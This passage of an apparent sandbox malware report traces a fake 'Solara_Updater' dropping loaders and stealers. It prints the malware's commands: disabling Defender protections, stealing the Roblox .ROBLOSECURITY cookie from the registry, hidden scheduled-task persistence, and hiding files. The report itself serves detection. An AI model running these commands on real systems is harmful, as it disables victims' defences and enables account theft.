N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\hostNet\bridgeblockportComBroker.exe N/A
Token: SeDebugPrivilege N/A C:\hostNet\bridgeblockportComBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2136 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2136 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2136 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2136 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2136 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2136 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2136 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2136 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2136 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2136 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2160 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2160 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2160 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2160 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1152 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1152 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1152 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1152 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1152 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1152 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1152 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1152 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1152 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1152 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2640 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2640 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2640 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2640 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2484 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2484 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2484 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2484 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2484 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2484 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2484 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2484 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2484 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2484 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2772 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2888 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2888 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2888 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2888 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2888 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 276 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 276 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 276 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2768 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2768 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2768 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2768 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2768 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2768 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2768 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2768 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2768 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2768 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 764 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 764 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 764 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\hostNet\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\hostNet\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\hostNet\taskhost.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f4mf1g3z\f4mf1g3z.cmdline"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E99.tmp" "c:\Windows\System32\CSC2FEC2B28D6C643E49C6489917F1F18A0.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Loader.exe'" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Loader" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Loader.exe'" /rl HIGHEST /f

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Loader.exe'" /rl HIGHEST /f

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 6 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 13 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Sybwy7Zv6j.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

